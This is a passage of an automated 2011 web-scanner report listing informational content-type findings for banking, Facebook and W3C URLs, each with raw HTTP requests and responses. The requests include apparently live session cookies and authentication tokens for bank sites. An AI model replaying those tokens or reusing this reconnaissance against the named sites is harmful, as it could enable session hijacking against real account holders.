Accept-Ranges: bytes
ETag: "0db7d8d23bcb1:23f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:00:02 GMT

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Macintosh.2010:08:04 16:29:57.......
...[SNIP]...

27.46. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 01:06:43 GMT
Content-Length: 22

Invalid Application ID

27.47. http://www.jpmorgan.com/cm/Satellite  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jpmorgan.com
Path:   /cm/Satellite

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cm/Satellite?c=CSElement&cid=1159296966913&pagename=Global_Javascript HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:45 GMT
Server: Apache
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: text/html; charset=UTF-8
Content-Length: 3246


/* Function to swap input fields in client login box */
function checkSelected()
{
   if (document.myForm.selection.value == "page1") {
       if (document.getElementById("loginIntroText"))
   
...[SNIP]...

27.48. http://www.jpmorgan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jpmorgan.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:24 GMT
Server: Apache
Last-Modified: Mon, 18 Aug 2008 20:30:58 GMT
ETag: "47c5-37e-d94d8480"
Accept-Ranges: bytes
Content-Length: 894
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: text/plain

..............h.......(....... ................................ 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6. 6
...[SNIP]...

27.49. https://www.navyfederal.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.navyfederal.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.navyfederal.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:50 GMT
Server: Apache
Last-Modified: Mon, 13 Sep 2010 22:31:43 GMT
ETag: "47e-a92af1c0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:00:50 GMT
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

............ .h.......(....... ..... ........................................!...........................'...'.......................$...K...b...U...,..........+...Y...y...v...P...$...............G..
...[SNIP]...

27.50. http://www.w3.org/TR/html4/loose.dtd  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR/html4/loose.dtd

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /TR/html4/loose.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:28:22 GMT
Server: Apache/2
Content-Location: loose.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "b17a-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 45434
Cache-Control: max-age=7776000
Expires: Tue, 03 May 2011 22:28:22 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is the HTML 4.01 Transitional DTD, which includes
presentation attributes and elements that W3C expects to phase out
as support for style sheets matures. Authors should use the S
...[SNIP]...

27.51. http://www.w3.org/TR/html4/strict.dtd  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR/html4/strict.dtd

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:29:53 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=7776000
Expires: Tue, 03 May 2011 22:29:53 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...

27.52. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR/xhtml1/DTD/xhtml1-strict.dtd

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/xhtml1/DTD/xhtml1-strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:25:52 GMT
Server: Apache/2
Content-Location: xhtml1-strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Thu, 01 Aug 2002 13:56:03 GMT
ETag: "6380-3a726d58522c0;49b4ff0d42800"
Accept-Ranges: bytes
Content-Length: 25472
Cache-Control: max-age=7776000
Expires: Tue, 03 May 2011 22:25:52 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
Extensible HTML version 1.0 Strict DTD

This is the same as HTML 4 Strict except for
changes due to the differences between XML and SGML.

Namespace = http://www.w3.org/1999/xhtml


...[SNIP]...

27.53. https://www.wachovia.com/foundation/v/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.wachovia.com
Path:   /foundation/v/index.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /foundation/v/index.jsp HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 22:28:53 GMT
Server: IBM_HTTP_Server
$WSEP:
Set-Cookie: wcp_hawk_accepted=true; Path=/; Secure
Set-Cookie: JSESSIONID=0000AlN9_xVDmP9QYaasX1jvJDV:13k56putc; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=38
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 31

Error 404: Error reported: 404

27.54. https://www2.bankofamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www2.bankofamerica.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www2.bankofamerica.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; cmRS=t3=1296686185861&pi=AboutBAC%3AHelp%3APageNotFound%3BCF-HTTPS-PageNotFound; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:31:46 GMT
Content-length: 1406
Content-type: text/plain
Last-modified: Thu, 18 Nov 2004 15:00:26 GMT
Etag: "57e-419cb90a"
Accept-ranges: bytes
Connection: close

..............h.......(....... ...........@...............................................................................................................k...H...%............z...b...Js..2P...........
...[SNIP]...

27.55. https://www4.usbank.com/internetBanking/RequestRouter  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/RequestRouter

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /internetBanking/RequestRouter?requestCmdId=DisplayLoginPage HTTP/1.1
Host: www4.usbank.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:00:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Set-Cookie: JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; Path=/internetBanking
Set-Cookie: CAMPID=""; Expires=Sat, 02 Feb 2041 04:23:43 GMT; Path=/; Domain=.usbank.com
Server: WebSphere Application Server/6.1


<noscript>
<HTML>
<HEAD>
<meta http-equiv="Refresh" content="0; URL=https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp#enablingjavascript">

<META NAME="keywords" C
...[SNIP]...

28. Content type is not specified  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.wachovia.com
Path:   /favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: search.wachovia.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CB01F7F42F17102FA757AB53C440707C; originalReferrer=; s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"7406-1214514609501"
Last-Modified: Thu, 26 Jun 2008 21:10:09 GMT
Content-Length: 7406
Date: Wed, 02 Feb 2011 22:04:17 GMT

......00..........6... ......................h.......(...0...`............
......................................................................k...H...%............z...b...Js..2P.............k...Hs
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 13:16:15 CST 2011.